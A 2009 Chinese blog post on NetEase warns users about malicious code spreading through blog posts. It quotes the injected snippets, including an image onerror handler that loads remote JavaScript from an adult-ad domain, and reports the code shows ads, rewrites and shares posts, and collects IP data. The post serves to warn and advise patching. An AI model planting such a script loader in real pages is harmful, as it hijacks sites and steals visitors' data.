注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

超哥的博客

 
 
 

日志

 
 

最近网易博客上流传的恶意代码  

2009-06-22 13:11:01|  分类: IT |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
现象:

一篇正常的日志,莫名其妙地在日志的头部会多出一段代码:

<IMG title=0 height=0 alt=0 src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" width=0> <A href="http://love.avtupian.com/a/163/index.html" target=_blank><IMG title=AV美女图片站:http://avtupian.com去了就想... alt=AV美女图片站:http://avtupian.com去了就想... src="http://love.avtupian.com/a/163/daolian.gif"></A>

而且删掉之后还会被加上。

有同学分析过代码,该代码除了弹广告、修改日志、自动分享日志外,还搜集用户个人信息,包括IP地址等。

建议使用IE浏览器的同学尽快打上补丁,或是使用非IE内核的浏览器上网。

6月22日晚Update:

根据博友“老港”同学提供的线索,目前代码的形式已变为:

<img title="" alt="" src="http://hi.baidu.com.googl0/ee.cn/ee.jpg" onerror="var s=document.createElement('script');s.src='http://love.avtupian.com/a/163/blog.jpg';s.type='text/javascript';s.charset='gb2312';document.getElementsByTagName('head').item(0).appendChild(s);" height="0" width="0">

而且在网易博客上蔓延速度很快,随便去查看了一些博友的日志,大多数都不幸中招——av图片灵魂附体!

中招的博客貌似发表评论会不成功,有些还会在日志正文出现乱码。

顺便调查一下,中招的同学你们用的浏览器是什么?是IE6?IE7?IE8?还是其他的浏览器?(感觉中招的基本上都是用低版本的IE。凡是使用Firefox、Chrome等非IE内核浏览器的都没中招。)


         

  评论这张
 
阅读(1695)| 评论(62)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017